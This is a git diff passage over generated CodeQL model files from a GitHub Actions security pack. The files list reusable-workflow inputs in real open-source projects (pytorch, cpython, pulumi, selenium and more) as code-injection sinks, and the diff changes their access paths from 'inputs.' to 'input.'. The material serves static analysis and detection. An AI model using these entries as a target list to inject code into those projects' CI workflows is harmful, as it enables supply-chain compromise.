b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index ecea4012c75..affc12cdc4a 100644 
--- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "inputs.pytest_test_directory", "code-injection", "generated"] - - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "inputs.job_name", "code-injection", "generated"] - - ["pennylaneai/pennylane/.github/workflows/interface-unit-tests.yml", "*", "inputs.run_lightened_ci", "code-injection", "generated"] \ No newline at end of file + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.job_name", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/interface-unit-tests.yml", "*", "input.run_lightened_ci", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index f8ee5402a92..b1c4d2f2cbf 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "inputs.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file + - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index aa76014db32..4ccbd71f8c3 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "inputs.tags", "code-injection", "generated"] - - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "inputs.suites", "code-injection", "generated"] - - ["pixie-io/pixie/.github/workflows/get_image.yaml", "*", "inputs.image-base-name", "code-injection", "generated"] \ No newline at end of file + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.suites", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/get_image.yaml", "*", "input.image-base-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index e52ce3c8318..2eb2104b542 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "inputs.release-version", "code-injection", "generated"] \ No newline at end of file + - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index 31f24a27268..fee95860030 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.os", "code-injection", "generated"] - - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.product", "code-injection", "generated"] - - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.is_release", "code-injection", "generated"] \ No newline at end of file + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.product", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.is_release", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index 4ace66c79c3..49a98d4dda5 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "inputs.benchmark", "code-injection", "generated"] - - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "inputs.trace", "code-injection", "generated"] \ No newline at end of file + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.trace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index 44518d6a348..aa432107a0d 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file + - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index c0edbfae484..40053c68c1a 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "inputs.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file + - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index a28ffce30f7..645ec756783 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "inputs.ent-public-key", "code-injection", "generated"] - - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "inputs.build-config-path", "code-injection", "generated"] \ No newline at end of file + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index afe2daa172e..3d80594c0d5 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["prql/prql/.github/workflows/test-rust.yaml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index a07044c0ccc..e542d409efe 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "inputs.test-command", "code-injection", "generated"] - - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "inputs.test-name", "code-injection", "generated"] - - ["pulumi/pulumi/.github/workflows/ci-dev-release.yml", "*", "inputs.version", "code-injection", "generated"] - - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-name", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-dev-release.yml", "*", "input.version", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "input.arch", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 250307e3acd..5ebf7426d16 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "inputs.ignore_dependency_check", "code-injection", "generated"] - - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "inputs.debug", "code-injection", "generated"] - - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/matrix.yml", "*", "inputs.flags", "code-injection", "generated"] \ No newline at end of file + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "input.debug", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/matrix.yml", "*", "input.flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index e968f209706..c5630248f7f 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "inputs.manifest-dir", "code-injection", "generated"] \ No newline at end of file + - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 438f637a9a0..4ea93f374b3 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pyo3/pyo3/.github/workflows/build.yml", "*", "inputs.extra-features", "code-injection", "generated"] \ No newline at end of file + - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index 7e7b82b25f5..d702e7ad830 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "inputs.options", "code-injection", "generated"] - - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "inputs.options", "code-injection", "generated"] \ No newline at end of file + - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] + - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "input.options", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index e3c3b19e441..baba2fc1e15 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "inputs.release_tag", "code-injection", "generated"] \ No newline at end of file + - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index 704adb3f121..feb68c4bdd7 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pytorch/xla/.github/workflows/_test.yml", "*", "inputs.test-script", "code-injection", "generated"] \ No newline at end of file + - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index 5300a7d145e..d3b779c1afa 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "inputs.buckets", "code-injection", "generated"] \ No newline at end of file + - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index f82254bd22b..6b0e733be17 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "inputs.tagged_release", "code-injection", "generated"] - - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "inputs.target_branch", "code-injection", "generated"] - - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "inputs.tagged_release", "code-injection", "generated"] - - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "inputs.registry_target", "code-injection", "generated"] \ No newline at end of file + - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "input.tagged_release", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "input.registry_target", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index 80a26a9e65f..cf9971e8524 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "inputs.gdal_ref", "code-injection", "generated"] \ No newline at end of file + - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index eb5e7835565..b3518a7a8ee 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "inputs.architecture", "code-injection", "generated"] \ No newline at end of file + - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index cd2629f49bc..a60fba237ef 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["remix-run/remix/.github/workflows/stacks.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index 77ad5d6a6d3..37f2febb70f 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "inputs.version_override", "code-injection", "generated"] - - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.architecture", "code-injection", "generated"] - - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.OS", "code-injection", "generated"] - - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.version_override", "code-injection", "generated"] \ No newline at end of file + - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.architecture", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.OS", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.version_override", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index a881a1a5fd3..6e3d48dbf89 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "inputs.total-shard", "code-injection", "generated"] \ No newline at end of file + - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index 693d3abc03e..465fff41145 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "inputs.prerel_name", "code-injection", "generated"] \ No newline at end of file + - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 119cbe465e6..3f091f1c961 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.target_version", "code-injection", "generated"] - - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.configuration", "code-injection", "generated"] - - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.configuration", "code-injection", "generated"] + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index 2d35b933923..efa591f749d 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "inputs.daisyuiversion", "code-injection", "generated"] - - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "inputs.daisyuiversion", "code-injection", "generated"] \ No newline at end of file + - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] + - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "input.daisyuiversion", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index 7ca34fc3e44..4bd74701fde 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.stage", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets_optional", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets_pre", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/docker_hub.yml", "*", "inputs.dockerhub_repository", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/docker.yml", "*", "inputs.timeout", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/docker.yml", "*", "inputs.docker_push_repository", "code-injection", "generated"] \ No newline at end of file + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_optional", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_pre", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker_hub.yml", "*", "input.dockerhub_repository", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker.yml", "*", "input.timeout", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker.yml", "*", "input.docker_push_repository", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index d3cc8e73b70..34d11e19946 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "inputs.constraints", "code-injection", "generated"] - - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "inputs.constraints", "code-injection", "generated"] \ No newline at end of file + - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] + - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "input.constraints", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index a9f8401aab2..fb4a8248853 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "inputs.job_status", "code-injection", "generated"] \ No newline at end of file + - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index acf43426e56..ef3af44da3a 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "inputs.run", "code-injection", "generated"] - - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "inputs.ruby-version", "code-injection", "generated"] \ No newline at end of file + - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] + - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.ruby-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index 3c9178a9125..a8c86c49d7c 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "inputs.latest", "code-injection", "generated"] - - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["shaka-project/shaka-packager/.github/workflows/build.yaml", "*", "inputs.self_hosted", "code-injection", "generated"] \ No newline at end of file + - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] + - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.tag", "code-injection", "generated"] + - ["shaka-project/shaka-packager/.github/workflows/build.yaml", "*", "input.self_hosted", "code-injection", "generated"] \ No newline at end of file 
